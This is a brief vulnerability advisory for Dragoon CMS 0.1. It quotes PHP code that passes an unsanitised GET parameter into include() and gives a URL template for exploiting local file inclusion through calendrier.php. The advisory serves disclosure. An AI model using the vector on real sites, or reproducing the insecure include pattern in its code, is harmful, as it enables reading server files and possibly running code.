Dragoon version 0.1 suffers from a local file inclusion vulnerability.
127fcae3ea7b13bb7375edde9f72c398a27c9f20c466fe28d08f447ef8945aae
Script Name :Dragoon CMS
Download : http://sourceforge.net/project/showfiles.php?group_id=118780
Error :
$cal['lng']=$_GET['lng'];
include('../lang/'.$cal['lng'].'.php');
Vul Code : http://[site]/[path]/forum/kietu/libs/calendrier.php?cal[lng]=[LFI]